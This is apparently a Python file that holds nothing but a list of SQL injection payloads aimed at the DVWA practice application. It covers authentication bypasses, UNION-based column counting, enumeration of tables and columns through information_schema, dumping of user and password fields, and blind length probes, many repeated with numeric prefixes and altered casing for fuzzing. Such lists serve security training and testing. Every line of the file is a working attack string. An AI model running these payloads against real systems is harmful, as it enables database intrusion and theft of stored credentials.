payloads = [
    "' OR 1=1 #",
    "' OR TRUE #",
    "' OR '1'='1' #",
    "' OR '1'='1' LIMIT 1 #",
    "' OR TRUE LIMIT 1 #",
    "' OR 1=1 LIMIT 5 #",
    "' UNION SELECT 1 #",
    "' UNION SELECT 1, 2 #",
    "' UNION SELECT 1, 2, 3 #",
    "' UNION SELECT 1, 2, 3, 4 #",
    "' UNION SELECT 1, 2, 3, 4, 5 #",
    "' UNION SELECT 1, 2, 3, 4, 5, 6 #",
    "' UNION SELECT 1, 2, 3, 4, 5, 6, 7 #",
    "' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8 #",
    "' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9 #",
    "' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 #",
    "' UNION SELECT 1,database() #",
    "' UNION SELECT database(), 2 #",
    "' UNION SELECT 1, table_name FROM information_schema.tables #",
    "' UNION SELECT table_name,2 FROM information_schema.tables #",
    "' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa' #",
    "' UNION SELECT table_name, 2 FROM information_schema.tables WHERE table_schema='dvwa' #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' AND table_schema='dvwa' #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' LIMIT 2,1 #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' LIMIT 1,1 #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' LIMIT 2,1 #",
    "' UNION SELECT user,password FROM dvwa.users #",
    "' UNION SELECT comment,name FROM dvwa.guestbook #",
    "' UNION SELECT user,password FROM dvwa.users LIMIT 1,1 #",
    "' UNION SELECT comment,name FROM dvwa.guestbook LIMIT 1,1#",
    "' UNION SELECT user,password FROM dvwa.users LIMIT 2,1 #",
    "61' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' LIMIT 2,1 #",
    "32' UNION SELECT 1, 2, 3, 4 #",
    "84' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "66' UNION SELECT 1, 2, 3, 4, 5, 6 #",
    "65' OR '1'='1' LIMIT 1 #",
    "59' OR TRUE #",
    "69' OR TRUE #",
    "97' UNION SELECT table_name,2 FROM information_schema.tables #",
    "36' UNION SELECT 1, 2, 3 #",
    "47' UNION SELECT table_name,2 FROM information_schema.tables #",
    "20' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' #",
    "7' UNION SELECT 1, table_name FROM information_schema.tables #",
    "12' UNION SELECT user,password FROM dvwa.users LIMIT 2,1 #",
    "64' OR 1=1 LIMIT 5 #",
    "58' UNION SELECT comment,name FROM dvwa.guestbook #",
    "44' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8 #",
    "56' UNION SELECT comment,name FROM dvwa.guestbook LIMIT 1,1#",
    "4' OR TRUE #",
    "45' UNION SELECT 1, 2, 3, 4 #",
    "16' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' LIMIT 2,1 #",
    "60' UNION SELECT comment,name FROM dvwa.guestbook LIMIT 1,1#",
    "37' UNION SELECT 1, table_name FROM information_schema.tables #",
    "30' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "76' UNION SELECT user,password FROM dvwa.users LIMIT 1,1 #",
    "59' UNION SELECT comment,name FROM dvwa.guestbook LIMIT 1,1#",
    "64' UNION SELECT 1, 2, 3 #",
    "20' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' LIMIT 2,1 #",
    "10' UNION SELECT 1, 2, 3, 4, 5, 6, 7 #",
    "7' UNION SELECT user,password FROM dvwa.users LIMIT 2,1 #",
    "68' OR '1'='1' LIMIT 1 #",
    "48' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' #",
    "77' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' LIMIT 2,1 #",
    "46' OR '1'='1' #",
    "39' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa' #",
    "72' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' #",
    "42' OR 1=1 #",
    "30' UNION SELECT 1, 2, 3, 4, 5, 6 #",
    "88' UNION SELECT table_name, 2 FROM information_schema.tables WHERE table_schema='dvwa' #",
    "10' UNION SELECT table_name,2 FROM information_schema.tables #",
    "60' UNION SELECT 1, 2, 3, 4 #",
    "94' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' LIMIT 2,1 #",
    "6' OR '1'='1' #",
    "20' OR 1=1 LIMIT 5 #",
    "54' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' AND table_schema='dvwa' #",
    "28' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' #",
    "33' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "26' UNION SELECT user,password FROM dvwa.users LIMIT 2,1 #",
    "97' OR 1=1 #",
    "83' OR TRUE LIMIT 1 #",
    "62' UNION SELECT 1, 2, 3, 4, 5 #",
    "88' OR '1'='1' #",
    "42' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "96' UNION SELECT 1 #",
    "63' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa' #",
    "23' UNION SELECT database(), 2 #",
    "38' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' LIMIT 2,1 #",
    "84' UNION SELECT 1, 2, 3, 4, 5 #",
    "28' OR '1'='1' LIMIT 1 #",
    "37' UNION SELECT 1, 2, 3, 4, 5, 6, 7 #",
    "9' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' AND table_schema='dvwa' #",
    "96' UNION SELECT 1, 2 #",
    "20' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' #",
    "67' OR '1'='1' LIMIT 1 #",
    "33' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 #",
    "65' OR TRUE #",
    "13' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 #",
    "15' UNION SELECT user,password FROM dvwa.users LIMIT 2,1 #",
    "26' UNION SELECT 1, 2, 3, 4, 5, 6 #",
    "84' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa' #",
    "37' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' LIMIT 2,1 #",
    "73' UNION SELECT 1, 2, 3, 4 #",
    "40' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' #",
    "61' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 #",
    "9' UNION SELECT 1 #",
    "28' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 #",
    "17' UNION SELECT 1, 2, 3, 4, 5, 6 #",
    "23' OR '1'='1' LIMIT 1 #",
    "25' UNION SELECT comment,name FROM dvwa.guestbook #",
    "79' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "35' UNION SELECT 1 #",
    "60' OR TRUE LIMIT 1 #",
    "3' UNION SELECT 1, 2, 3, 4 #",
    "13' UNION SELECT 1, 2 #",
    "87' UNION SELECT database(), 2 #",
    "66' UNION SELECT 1, 2, 3, 4 #",
    "76' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 #",
    "74' OR '1'='1' LIMIT 1 #",
    "98' UNION SELECT 1, 2, 3, 4, 5, 6 #",
    "10' OR TRUE #",
    "33' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' #",
    "95' UNION SELECT 1, 2, 3, 4 #",
    "96' UNION SELECT table_name, 2 FROM information_schema.tables WHERE table_schema='dvwa' #",
    "32' UNION SELECT 1, 2, 3, 4, 5, 6, 7 #",
    "67' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa' #",
    "76' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' #",
    "7' UNION SELECT comment,name FROM dvwa.guestbook LIMIT 1,1#",
    "98' UNION SELECT 1, table_name FROM information_schema.tables #",
    "56' UNION SELECT 1, table_name FROM information_schema.tables #",
    "20' UNION SELECT 1, 2, 3 #",
    "74' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=1) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=2) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=3) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=4) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=5) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=6) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=7) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=8) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=9) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=1) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=2) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=3) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=4) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=5) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=6) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=7) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=8) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=9) #",
    "23' union SELECT DATABASE(), 2 #",
    "' UNION SELECT 1,column_name from information_schema.columns WHERE table_name='guestbook' LIMIT 2,1 #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' LIMIT 2,1 #",
    "87' UNION select DATABASE(), 2 #",
    "37' UNION SELECT 1,column_name from information_schema.columns WHERE table_name='users' and table_schema='dvwa' LIMIT 2,1 #",
    "94' UNION SELECT 1,column_name FROM information_schema.columns WHERE TABLE_NAME='GUESTBOOK' LIMIT 2,1 #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=1) #",
    "' UNION select 1, 2, 3, 4, 5, 6 #",
    "' or 1=1 #",
    "' UNION select 1,column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='users' and table_schema='dvwa' #",
    "66' union SELECT 1, 2, 3, 4, 5, 6 #",
    "7' union SELECT user,password FROM DVWA.USERS LIMIT 2,1 #",
    "62' UNION SELECT 1, 2, 3, 4, 5 #",
    "20' UNION select 1,column_name FROM information_schema.columns WHERE TABLE_NAME='USERS' AND table_schema='dvwa' LIMIT 2,1 #",
    "1' AND (SELECT 1 from information_schema.columns WHERE table_schema='dvwa' AND table_name='users' and LENGTH(COLUMN_NAME)=2) #",
    "54' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='guestbook' and table_schema='dvwa' #",
    "98' UNION select 1, 2, 3, 4, 5, 6 #",
    "4' OR true #",
    "1' and (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=7) #",
    "20' union select 1, 2, 3 #",
    "96' UNION SELECT table_name, 2 FROM information_schema.tables WHERE table_schema='dvwa' #",
    "' UNION select 1, 2, 3, 4, 5, 6 #",
    "' union SELECT 1,table_name FROM INFORMATION_SCHEMA.TABLES where table_schema='dvwa' #",
    "84' union select 1,table_name from information_schema.tables WHERE table_schema='dvwa' #",
    "66' UNION select 1, 2, 3, 4, 5, 6 #",
    "44' union select 1, 2, 3, 4, 5, 6, 7, 8 #",
    "' OR TRUE #",
    "10' OR TRUE #",
    "' union SELECT 1, 2, 3, 4, 5, 6 #",
    "37' UNION SELECT 1, table_name from information_schema.tables #",
    "20' OR 1=1 LIMIT 5 #",
    "1' AND (select 1 FROM information_schema.columns WHERE table_schema='dvwa' and table_name='users' and LENGTH(column_name)=2) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=6) #",
    "4' or TRUE #",
    "' UNION select 1,column_name from information_schema.columns WHERE table_name='guestbook' LIMIT 2,1 #",
    "45' union select 1, 2, 3, 4 #",
    "' OR TRUE limit 1 #",
    "68' OR '1'='1' limit 1 #",
    "26' UNION SELECT 1, 2, 3, 4, 5, 6 #",
    "' UNION SELECT 1,column_name FROM information_schema.columns WHERE TABLE_NAME='USERS' #",
    "' UNION SELECT table_name, 2 FROM information_schema.tables where table_schema='dvwa' #",
    "97' UNION select table_name,2 FROM information_schema.tables #",
    "94' UNION SELECT 1,column_name FROM information_schema.columns WHERE TABLE_NAME='GUESTBOOK' LIMIT 2,1 #",
    "68' OR '1'='1' LIMIT 1 #",
    "' UNION SELECT 1,table_name FROM information_schema.tables WHERE TABLE_SCHEMA='DVWA' #",
    "' UNION select 1,column_name FROM information_schema.columns where table_name='users' AND TABLE_SCHEMA='DVWA' #",
    "33' union SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "15' UNION SELECT user,password from dvwa.users LIMIT 2,1 #",
    "64' OR 1=1 LIMIT 5 #",
    "1' AND (select 1 FROM INFORMATION_SCHEMA.COLUMNS where table_schema='dvwa' AND table_name='users' and LENGTH(column_name)=6) #",
    "42' UNION SELECT 1,COLUMN_NAME FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "72' UNION SELECT 1,COLUMN_NAME FROM information_schema.columns WHERE table_name='guestbook' #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=6) #",
    "58' union SELECT comment,name FROM dvwa.guestbook #",
    "12' union select user,password FROM dvwa.users LIMIT 2,1 #",
    "12' UNION SELECT user,password from dvwa.users limit 2,1 #",
    "39' UNION select 1,table_name FROM information_schema.tables WHERE TABLE_SCHEMA='DVWA' #",
    "32' UNION SELECT 1, 2, 3, 4, 5, 6, 7 #",
    "64' UNION SELECT 1, 2, 3 #",
    "61' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 #",
    "65' OR TRUE #",
    "65' or '1'='1' limit 1 #",
    "33' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' #",
    "64' union select 1, 2, 3 #",
    "60' UNION SELECT comment,name FROM DVWA.GUESTBOOK LIMIT 1,1#",
    "33' UNION select 1,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "77' UNION select 1,column_name FROM information_schema.columns WHERE table_name='users' and table_schema='dvwa' LIMIT 2,1 #",
    "40' UNION SELECT 1,column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='users' AND table_schema='dvwa' #",
    "1' AND (SELECT 1 from information_schema.columns WHERE table_schema='dvwa' AND table_name='users' AND LENGTH(column_name)=3) #",
    "37' UNION SELECT 1,COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME='USERS' and table_schema='dvwa' LIMIT 2,1 #",
    "30' UNION select 1, 2, 3, 4, 5, 6 #",
    "97' union select table_name,2 FROM information_schema.tables #",
    "58' UNION SELECT COMMENT,NAME FROM dvwa.guestbook #",
    "20' UNION SELECT 1,COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME='USERS' #",
    "13' UNION SELECT 1, 2 #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' and TABLE_NAME='USERS' AND LENGTH(column_name)=3) #",
    "42' OR 1=1 #",
    "97' union SELECT TABLE_NAME,2 FROM information_schema.tables #",
    "20' UNION SELECT 1,column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='USERS' #",
    "66' UNION SELECT 1, 2, 3, 4 #",
    "59' UNION select comment,name FROM DVWA.GUESTBOOK LIMIT 1,1#",
    "10' or TRUE #",
    "' UNION select 1 #",
    "42' UNION SELECT 1,column_name from information_schema.columns WHERE table_name='users' LIMIT 3,1 #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='users' and LENGTH(column_name)=1) #",
    "1' AND (SELECT 1 FROM information_schema.columns WHERE table_schema='dvwa' AND table_name='guestbook' AND LENGTH(column_name)=7) #",
    "' union SELECT 1, 2 #",
    "97' UNION SELECT table_name,2 FROM INFORMATION_SCHEMA.TABLES #",
    "58' UNION SELECT COMMENT,NAME FROM dvwa.guestbook #",
    "' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9 #",
    "28' union SELECT 1,column_name FROM information_schema.columns WHERE table_name='users' AND table_schema='dvwa' #",
    "' UNION select 1, 2 #",
    "60' UNION SELECT comment,name FROM DVWA.GUESTBOOK LIMIT 1,1#",
    "84' UNION select 1,table_name FROM information_schema.tables WHERE table_schema='dvwa' #",
    "20' UNION select 1, 2, 3 #",
    "97' UNION SELECT table_name,2 FROM INFORMATION_SCHEMA.TABLES #",
    "' union SELECT 1,column_name FROM information_schema.columns where TABLE_NAME='GUESTBOOK' #",
    "' OR TRUE limit 1 #",
    "28' OR '1'='1' LIMIT 1 #",
    "96' union SELECT 1, 2 #"
]